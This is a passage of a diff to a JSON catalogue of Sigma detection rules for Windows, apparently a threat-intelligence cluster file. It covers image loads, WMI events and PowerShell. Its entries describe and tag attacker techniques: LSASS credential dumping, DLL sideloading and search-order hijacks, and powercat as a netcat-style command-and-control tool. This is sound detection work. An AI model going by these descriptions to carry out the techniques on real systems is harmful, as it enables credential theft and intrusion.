}, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and 
some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "filename": "image_load_side_load_antivirus.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_third_party.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading" + }, + { + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + 
"filename": "image_load_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load" + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "meta": { + "author": "Patrick St. John, OTR (Open Threat Research)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "filename": "image_load_susp_python_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://www.py2exe.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ] + }, + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load" + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "meta": { + "author": "omkar72, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + 
"https://thewover.github.io/Introducing-Donut/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications" + }, + { + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_susp_fax_dll.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate 
PowerShell Hosts - Image" + }, + { + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "meta": { + "author": "frack113", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_classicexplorer32.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", + "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "caa02837-f659-466f-bca6-48bde2826ab4", + "value": "Potential DLL Sideloading Via ClassicExplorer32.dll" + }, + { + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_foggyweb_nobelium.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading" + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbghelp_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL" + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_scm.yml", + "level": "medium", + "logsource.category": "image_load", 
+ "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload" + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmi_module_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded" + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 
Loading Renamed Comsvcs DLL" + }, + { + "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/06/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_msdt_sdiageng.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ] + }, + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library" + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from Nondefault Path" + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "filename": 
"image_load_unsigned_image_loaded_into_lsass.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process" + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_winword_vbadll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via Microsoft Word" + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_dll_load_system_process.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations" + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/01/07", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "filename": "image_load_susp_uncommon_image_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading" + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/07", + "falsepositive": [ + "Rarely observed" + ], + "filename": "image_load_usp_svchost_clfsw32.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern" + }, + { + "description": 
"Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded" + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. 
Detects meterpreter's \"load powershell\" extension.", + "meta": { + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "creation_date": "2019/11/14", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "filename": "image_load_in_memory_powershell.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/p3nt4/PowerShdll", + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ] + }, + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their 
library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "meta": { + "author": "SBousseaden", + "creation_date": "2019/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack" + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "meta": { + "author": "frack113", + "creation_date": "2022/02/03", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_advapi32_dll.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll" + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "meta": { + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "creation_date": "2021/06/29", + "falsepositive": [ + "Loading of legitimate driver" + ], + "filename": "image_load_spoolsv_dll_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/ly4k/SpoolFool", + 
"https://github.com/hhlxf/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_office_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload" + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." 
+ ], + "filename": "image_load_uipromptforcreds_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "image_load_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image" + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and 
NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path" + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer" + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "filename": "sysmon_wmi_event_subscription.yml", + "level": "medium", + "logsource.category": "wmi_event", + "logsource.product": "windows", 
+ "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription" + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro", + "creation_date": "2019/04/15", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "filename": "sysmon_wmi_susp_scripting.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI Consumer" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_powercat.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + 
"tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version" + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + 